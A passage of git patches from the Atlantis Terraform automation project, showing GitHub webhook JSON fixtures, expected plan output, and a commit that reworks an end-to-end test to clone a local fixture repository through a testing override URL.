"https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:17Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 8, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 2, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 2, + "watchers": 0, + "default_branch": "master" + }, + "sender": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + } +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt new file mode 100644 index 0000000000..15a712c428 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf new file mode 100644 index 0000000000..648c412e1f --- /dev/null +++ b/server/testfixtures/test-repos/simple/main.tf @@ -0,0 +1,3 @@ +resource "null_resource" "simple" { + count = 1 +} \ No newline at end of file From a9e9e18f2e4e648afb5051bc063dd8a60bc75da0 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Sat, 16 Jun 2018 18:11:30 +0100 Subject: [PATCH 24/69] Enable multiple cases for e2e testing --- server/events/atlantis_workspace.go | 9 +- server/events_controller.go | 7 +- server/events_controller_e2e_test.go | 164 ++++-- .../githubPullRequestClosedEvent.json | 468 ++++++++++++++++++ .../githubPullRequestOpenedEvent.json | 468 ++++++++++++++++++ .../testfixtures/test-repos/simple/.gitkeep | 0 .../test-repos/simple/exp-output-apply.txt | 13 + .../test-repos/simple/exp-output-autoplan.txt | 23 + .../test-repos/simple/exp-output-merge.txt | 3 + server/testfixtures/test-repos/simple/main.tf | 8 + 10 files changed, 1126 insertions(+), 37 deletions(-) create mode 100644 server/testfixtures/githubPullRequestClosedEvent.json create mode 100644 server/testfixtures/githubPullRequestOpenedEvent.json create mode 100644 server/testfixtures/test-repos/simple/.gitkeep create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply.txt create mode 100644 server/testfixtures/test-repos/simple/exp-output-autoplan.txt create mode 100644 server/testfixtures/test-repos/simple/exp-output-merge.txt diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go index a57aee053f..190b87790d 100644 --- a/server/events/atlantis_workspace.go +++ b/server/events/atlantis_workspace.go @@ -42,6 +42,9 @@ type AtlantisWorkspace interface { // FileWorkspace implements AtlantisWorkspace with the file system. type FileWorkspace struct { DataDir string + // TestingOverrideCloneURL can be used during testing to override the URL + // that is cloned. If it's empty then we clone normally. + TestingOverrideCloneURL string } // Clone git clones headRepo, checks out the branch and then returns the absolute @@ -68,7 +71,11 @@ func (w *FileWorkspace) Clone( } log.Info("git cloning %q into %q", headRepo.SanitizedCloneURL, cloneDir) - cloneCmd := exec.Command("git", "clone", headRepo.CloneURL, cloneDir) // #nosec + cloneURL := headRepo.CloneURL + if w.TestingOverrideCloneURL != "" { + cloneURL = w.TestingOverrideCloneURL + } + cloneCmd := exec.Command("git", "clone", cloneURL, cloneDir) // #nosec if output, err := cloneCmd.CombinedOutput(); err != nil { return "", errors.Wrapf(err, "cloning %s: %s", headRepo.SanitizedCloneURL, string(output)) } diff --git a/server/events_controller.go b/server/events_controller.go index b205f2eb8d..e9ee6e1e01 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -177,7 +177,12 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep // workspace to '*' to indicate that all applicable dirs and workspaces // should be planned. autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true) - go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) + if !e.TestingMode { + go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) + } else { + // When testing we want to wait for everything to complete. + e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) + } return case ClosedPullEvent: // If the pull request was closed, we delete locks. diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 97883c0a14..8a9bd66915 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -6,8 +6,8 @@ import ( "io/ioutil" "net/http" "net/http/httptest" - "os" "path/filepath" + "regexp" "strings" "testing" @@ -29,20 +29,111 @@ import ( . "github.com/runatlantis/atlantis/testing" ) -func Test(t *testing.T) { +/* +flows: +- pull request opened autoplan +- comment to apply + +github/gitlab + +locking + +merging pull requests + +different repo organizations + +atlantis.yaml + +*/ +func TestGitHubWorkflow(t *testing.T) { RegisterMockTestingT(t) - // Config. + cases := []struct { + Description string + // RepoDir is relative to testfixtures/test-repos. + RepoDir string + ModifiedFiles []string + ExpAutoplanCommentFile string + ExpMergeCommentFile string + CommentAndReplies []string + }{ + { + Description: "simple", + RepoDir: "simple", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis apply", "exp-output-apply.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", + }, + } + for _, c := range cases { + ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t) + t.Run(c.Description, func(t *testing.T) { + // Set the repo to be cloned through the testing backdoor. + repoDir, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", c.RepoDir)) + Ok(t, err) + atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir) + + // Setup test dependencies. + w := httptest.NewRecorder() + When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil) + When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil) + + // First, send the open pull request event and trigger an autoplan. + pullOpenedReq := GitHubPullRequestOpenedEvent(t) + ctrl.Post(w, pullOpenedReq) + responseContains(t, w, 200, "Processing...") + _, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + exp, err := ioutil.ReadFile(filepath.Join(repoDir, c.ExpAutoplanCommentFile)) + Ok(t, err) + Equals(t, string(exp), autoplanComment) + + // Now send any other comments. + for i := 0; i < len(c.CommentAndReplies); i += 2 { + comment := c.CommentAndReplies[i] + expOutputFile := c.CommentAndReplies[i+1] + + commentReq := GitHubCommentEvent(t, comment) + w = httptest.NewRecorder() + ctrl.Post(w, commentReq) + responseContains(t, w, 200, "Processing...") + _, _, autoplanComment = vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + + exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile)) + Ok(t, err) + // Replace all 'ID: 1111818181' strings with * so we can do a comparison. + idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) + autoplanComment = idRegex.ReplaceAllString(autoplanComment, "(ID: ******************)") + Equals(t, string(exp), autoplanComment) + } + + // Finally, send the pull request merged event. + pullClosedReq := GitHubPullRequestClosedEvent(t) + w = httptest.NewRecorder() + ctrl.Post(w, pullClosedReq) + responseContains(t, w, 200, "Pull request cleaned successfully") + _, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(3)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + exp, err = ioutil.ReadFile(filepath.Join(repoDir, c.ExpMergeCommentFile)) + Ok(t, err) + Equals(t, string(exp), pullClosedComment) + }) + } +} + +func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, *mocks.MockGithubPullGetter, *events.FileWorkspace) { allowForkPRs := false dataDir, cleanup := TempDir(t) defer cleanup() + testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple") + Ok(t, err) // Mocks. e2eVCSClient := vcsmocks.NewMockClientProxy() e2eStatusUpdater := mocks.NewMockCommitStatusUpdater() e2eGithubGetter := mocks.NewMockGithubPullGetter() e2eGitlabGetter := mocks.NewMockGitlabMergeRequestGetter() - e2eWorkspace := mocks.NewMockAtlantisWorkspace() // Real dependencies. logger := logging.NewSimpleLogger("server", nil, true, logging.Debug) @@ -66,6 +157,10 @@ func Test(t *testing.T) { projectLocker := &events.DefaultProjectLocker{ Locker: lockingClient, } + atlantisWorkspace := &events.FileWorkspace{ + DataDir: dataDir, + TestingOverrideCloneURL: testRepoDir, + } defaultTFVersion := terraformClient.Version() commandHandler := &events.CommandHandler{ @@ -85,7 +180,7 @@ func Test(t *testing.T) { ParserValidator: &yaml.ParserValidator{}, ProjectFinder: &events.DefaultProjectFinder{}, VCSClient: e2eVCSClient, - Workspace: e2eWorkspace, + Workspace: atlantisWorkspace, ProjectOperator: events.ProjectOperator{ Locker: projectLocker, LockURLGenerator: &mockLockURLGenerator{}, @@ -104,16 +199,20 @@ func Test(t *testing.T) { ApprovalOperator: runtime.ApprovalOperator{ VCSClient: e2eVCSClient, }, - Workspace: e2eWorkspace, + Workspace: atlantisWorkspace, Webhooks: &mockWebhookSender{}, }, }, } ctrl := server.EventsController{ - TestingMode: true, - CommandRunner: commandHandler, - PullCleaner: nil, + TestingMode: true, + CommandRunner: commandHandler, + PullCleaner: &events.PullClosedExecutor{ + Locker: lockingClient, + VCSClient: e2eVCSClient, + Workspace: atlantisWorkspace, + }, Logger: logger, Parser: eventParser, CommentParser: commentParser, @@ -133,32 +232,7 @@ func Test(t *testing.T) { Username: "atlantisbot", }, } - - // Test GitHub Post - req := GitHubCommentEvent(t, "atlantis plan") - w := httptest.NewRecorder() - When(e2eGithubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil) - testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple") - Ok(t, err) - When(e2eWorkspace.Clone(matchers.AnyPtrToLoggingSimpleLogger(), AnyRepo(), AnyRepo(), matchers.AnyModelsPullRequest(), AnyString())).ThenReturn(testRepoDir, nil) - // Clean up .terraform and plan files when we're done. - defer func() { - os.RemoveAll(filepath.Join(testRepoDir, ".terraform")) - planFiles, _ := filepath.Glob(testRepoDir + "/*.tfplan") - for _, file := range planFiles { - os.Remove(file) - } - }() - - ctrl.Post(w, req) - responseContains(t, w, 200, "Processing...") - _, _, comment := e2eVCSClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() - - exp, err := ioutil.ReadFile(filepath.Join(testRepoDir, "exp-output-atlantis-plan.txt")) - fmt.Println((string(exp))) - Ok(t, err) - - Equals(t, string(exp), comment) + return ctrl, e2eVCSClient, e2eGithubGetter, atlantisWorkspace } type mockLockURLGenerator struct{} @@ -184,6 +258,26 @@ func GitHubCommentEvent(t *testing.T, comment string) *http.Request { return req } +func GitHubPullRequestOpenedEvent(t *testing.T) *http.Request { + requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestOpenedEvent.json")) + Ok(t, err) + req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON)) + Ok(t, err) + req.Header.Set("Content-Type", "application/json") + req.Header.Set(githubHeader, "pull_request") + return req +} + +func GitHubPullRequestClosedEvent(t *testing.T) *http.Request { + requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestClosedEvent.json")) + Ok(t, err) + req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON)) + Ok(t, err) + req.Header.Set("Content-Type", "application/json") + req.Header.Set(githubHeader, "pull_request") + return req +} + func GitHubPullRequestParsed() *github.PullRequest { return &github.PullRequest{ Number: github.Int(1), diff --git a/server/testfixtures/githubPullRequestClosedEvent.json b/server/testfixtures/githubPullRequestClosedEvent.json new file mode 100644 index 0000000000..1fd568761e --- /dev/null +++ b/server/testfixtures/githubPullRequestClosedEvent.json @@ -0,0 +1,468 @@ +{ + "action": "closed", + "number": 1, + "pull_request": { + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1", + "id": 193308707, + "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3", + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1", + "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff", + "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch", + "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1", + "number": 1, + "state": "closed", + "locked": false, + "title": "Add new project layouts", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "body": "", + "created_at": "2018-06-07T12:45:41Z", + "updated_at": "2018-06-16T16:55:19Z", + "closed_at": "2018-06-16T16:55:19Z", + "merged_at": null, + "merge_commit_sha": "e96e1cea0d79f4ff07845060ade0b21ff1ffe37f", + "assignee": null, + "assignees": [ + + ], + "requested_reviewers": [ + + ], + "requested_teams": [ + + ], + "labels": [ + + ], + "milestone": null, + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits", + "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments", + "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e", + "head": { + "label": "runatlantis:atlantisyaml", + "ref": "atlantisyaml", + "sha": "5e2d140b2d74bf61675677f01dc947ae8512e18e", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "repo": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:17Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 8, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 1, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 1, + "watchers": 0, + "default_branch": "master" + } + }, + "base": { + "label": "runatlantis:master", + "ref": "master", + "sha": "f59a822e83b3cd193142c7624ea635a5d7894388", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "repo": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:17Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 8, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 1, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 1, + "watchers": 0, + "default_branch": "master" + } + }, + "_links": { + "self": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1" + }, + "html": { + "href": "https://github.com/runatlantis/atlantis-tests/pull/1" + }, + "issue": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1" + }, + "comments": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments" + }, + "review_comments": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments" + }, + "review_comment": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}" + }, + "commits": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits" + }, + "statuses": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e" + } + }, + "author_association": "OWNER", + "merged": false, + "mergeable": true, + "rebaseable": true, + "mergeable_state": "clean", + "merged_by": null, + "comments": 62, + "review_comments": 0, + "maintainer_can_modify": false, + "commits": 3, + "additions": 198, + "deletions": 8, + "changed_files": 24 + }, + "repository": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + 